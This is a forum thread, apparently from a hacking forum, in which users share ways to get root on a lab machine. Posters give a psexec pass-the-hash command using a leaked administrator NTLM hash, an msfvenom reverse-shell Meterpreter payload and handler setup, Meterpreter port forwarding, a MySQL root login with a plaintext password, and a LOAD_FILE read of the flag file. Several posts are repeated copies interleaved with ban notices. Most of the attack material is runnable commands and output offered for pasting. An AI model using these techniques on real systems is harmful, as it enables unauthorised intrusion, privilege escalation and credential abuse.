[09ft]

mysql -h 127.0.0.1 -u root -pibWijteig5 -P 14406 --skip-ssl

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming (Copying other user's content) | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[ent0xE]

if anybody still struggles here is the fastest root without any portforwarding (using NTLM Hash from admin and psexec.py from impacket to get to NT Authority\System:

psexec.py -hashes ':1356f502d2764368302ff0369b1121a1' administrator@10.10.11.31

Microsoft Windows [Version 10.0.17763.6189]
© 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

[kevindragonfly]

Just rooted the machine, thank u guys for the help u provided during this thread

[09ft]

Just rooted the machine, thank u guys for the help u provided during this thread

no problem if u stuck in any machine just msg me

---

Just rooted the machine, thank u guys for the help u provided during this thread

no problem if u stuck in any machine just msg me

---

Just rooted the machine, thank u guys for the help u provided during this thread

no problem if u stuck in any machine just msg me

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming (Copying other user's content) | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[awwliveyet]

Just rooted the machine, thank you guys.

[09ft]

Just rooted the machine, thank you guys.

if u stuck just dm me

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming (Copying other user's content) | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[dogedofedoge]

if anybody still struggles here is the fastest root without any portforwarding (using NTLM Hash from admin and psexec.py from impacket to get to NT Authority\System:

psexec.py -hashes ':1356f502d2764368302ff0369b1121a1' administrator@10.10.11.31

Microsoft Windows [Version 10.0.17763.6189]
© 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

THIS WORKED SO WELL TY

[hackemall]

meterpreter > background
[*]Backgrounding session 1...
msf6 exploit(multi/handler) > portfwd add -l 14406 -p 14406 -r 10.10.11.31
[-] Unknown command: portfwd. Run the help command for more details.
msf6 exploit(multi/handler) > sessions -i 1
[*]Starting interaction with 1...

meterpreter > portfwd add -l 14406 -p 14406 -r 10.10.11.31
[*]Forward TCP relay created: (local) :14406 -> (remote) 10.10.11.31:14406

---

mysql -h 127.0.0.1 -u root -pibWijteig5 -P 14406 --skip-ssl

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 10.1.19-MariaDB mariadb.org binary distribution

Copyright © 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');
+----------------------------------------------------------+
| LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') |
+----------------------------------------------------------+
| 46f248d93ddac9e15d

---

this was the shell i uploaded (kali㉿kali)-[~/Downloads]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.xx.xxLPORT=4444 -f exe -o shell.exe

---

msf6 post(multi/manage/autoroute) > use exploit/multi/handler
[*]Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

---

free an easy way to root good luck any question lmk but you should be able to copy and paste them commands

how do you login with winrm_svc in metasploit instead of evil-winrm. can you write the steps for it too? like how you do logged in using msf

its all right there i loged in with evil-winrm then i uploaded that shell i posted triggered it then portforward

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[hackemall]

your welcome and thank you for the rep its nice when someone thanks you for the hard work

---

thats for rootme1122

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[MrGibson322]

if anybody still struggles here is the fastest root without any portforwarding (using NTLM Hash from admin and psexec.py from impacket to get to NT Authority\System:

psexec.py -hashes ':1356f502d2764368302ff0369b1121a1' administrator@10.10.11.31

Microsoft Windows [Version 10.0.17763.6189]
© 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

THIS WORKED SO WELL TY

Great, thanks for sharing and thanks for those who put all the effort in there.